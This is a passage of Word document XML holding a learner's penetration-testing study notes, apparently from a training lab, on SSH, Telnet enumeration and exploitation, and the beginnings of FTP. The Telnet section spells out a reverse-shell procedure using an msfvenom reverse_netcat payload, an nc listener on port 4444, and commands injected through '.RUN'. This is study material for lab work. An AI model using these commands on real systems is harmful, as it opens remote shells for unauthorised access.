        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F329C" w14:textId="2825A4B0" w:rsidR="00396CC4" w:rsidRPr="0084205E" w:rsidRDefault="00396CC4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Private key file, once permissions have been changed to 600 via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, can be used for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472BCF20" w14:textId="03234980" w:rsidR="00396CC4" w:rsidRPr="0084205E" w:rsidRDefault="00396CC4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -I &lt;private key filename&gt; </w:t>
      </w:r>
      <w:r w:rsidR="003363B4" w:rsidRPr="0084205E">
        <w:t>&lt;username&gt;@&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC753F1" w14:textId="7EEBA232" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="003363B4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA4FC1" w14:textId="2DAA6B92" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="003363B4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Application protocol which allows, via telnet client, connection</w:t>
      </w:r>
      <w:r w:rsidR="00345325" w:rsidRPr="0084205E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and execution of commands on a remote machine hosting a telnet server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3213F60B" w14:textId="631A7760" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="003363B4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client becomes virtual terminal allowing you to interact with the remote host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962977D" w14:textId="468B4358" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="003363B4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sends messages in cleartext and has been replaced by SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A35903" w14:textId="41FDB62D" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="003363B4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Accessed via “telnet” command and then use telnet-specific commands in the Telnet prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D42C03A" w14:textId="699938B0" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="003363B4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax: telnet [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>][port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620A2C9" w14:textId="39234327" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="003363B4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Ex. telnet 10.10.10.3 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D40902" w14:textId="4551E388" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="003363B4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192C294" w14:textId="7DED9288" w:rsidR="003363B4" w:rsidRPr="0084205E" w:rsidRDefault="00345325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Methodology must be thorough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1B6B16" w14:textId="0A4438A2" w:rsidR="00345325" w:rsidRPr="0084205E" w:rsidRDefault="00345325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Begin with port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763D48BC" w14:textId="4D9D8FA8" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309CEF15" w14:textId="42E11D18" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>No encryption and has typically poor access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125F244" w14:textId="0D972EAD" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6526C" w14:textId="68515730" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Poorly hidden telnet services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138ABF75" w14:textId="2081B6C7" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service markings – example indicates “backdoor”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DB634" w14:textId="553C6A45" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Identifying information – example indicates username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5B2C2" w14:textId="20578EF7" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use information to access telnet port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A145C1E" w14:textId="4BA86163" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Connecting to Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ACE2EB" w14:textId="140D8EF4" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>telnet [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>][port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6731D22C" w14:textId="1234E593" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reverse Shell Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125801D6" w14:textId="047684E9" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shell is a piece of code or program which can be used to gain code or command execution on a device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D58203" w14:textId="057C0EF1" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reverse shells have target machine communicate back to the attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355F950" w14:textId="05A7CEB9" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attacking machine has a listening port that receives communication, allowing code/command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B23367" w14:textId="597CC2ED" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Once access has been granted using telnet [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>] [port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224EDD42" w14:textId="1F3E137D" w:rsidR="00376E3E" w:rsidRPr="0084205E" w:rsidRDefault="00376E3E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> listener on local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E597C" w14:textId="7B69FEAE" w:rsidR="00FA7548" w:rsidRPr="0084205E" w:rsidRDefault="00FA7548" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Syntax: sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> proto </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\icmp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C4E40" w14:textId="1AA5013A" w:rsidR="00FA7548" w:rsidRPr="0084205E" w:rsidRDefault="00FA7548" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uses ICMP traffic listener using specific OpenVPN connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472CC764" w14:textId="27E77845" w:rsidR="00FA7548" w:rsidRPr="0084205E" w:rsidRDefault="00FA7548" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">On client side, use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>“.RUN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> ping &lt;attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; -c 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FDBBB7" w14:textId="7C52F4F9" w:rsidR="00FA7548" w:rsidRPr="0084205E" w:rsidRDefault="00FA7548" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows single ping to attacker to confirm inputs can be executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CFFFA" w14:textId="2CE5A3E9" w:rsidR="00FA7548" w:rsidRPr="0084205E" w:rsidRDefault="00EC1FEF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>In new terminal, create reverse shell using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDE83B" w14:textId="3626FBFE" w:rsidR="00EC1FEF" w:rsidRPr="0084205E" w:rsidRDefault="00EC1FEF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse_netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&lt;local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=4444 R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E10B9" w14:textId="18A0F8AA" w:rsidR="00EC1FEF" w:rsidRPr="0084205E" w:rsidRDefault="00EC1FEF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72704694" w14:textId="1E97C5AD" w:rsidR="00EC1FEF" w:rsidRPr="0084205E" w:rsidRDefault="00EC1FEF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F873A04" w14:textId="3621E374" w:rsidR="00EC1FEF" w:rsidRPr="0084205E" w:rsidRDefault="00EC1FEF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Copy and paste </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> output (denoted by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">) into telnet session, preceded </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>by .RUN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1FB527" w14:textId="0BC52409" w:rsidR="00EC1FEF" w:rsidRPr="0084205E" w:rsidRDefault="00EC1FEF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Run session as normal navigation in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25042E4F" w14:textId="259FF6F5" w:rsidR="00EC1FEF" w:rsidRPr="0084205E" w:rsidRDefault="003810F8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Understanding FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D1E1D0" w14:textId="12AF8CDC" w:rsidR="003810F8" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Transfer Protocol – port 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F1712" w14:textId="3B5F2CC8" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client-server model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D45DAA2" w14:textId="32AF39EA" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client initiates connection, server validates login credentials, enabling execution of FTP commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23553E8B" w14:textId="7DCF98B9" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
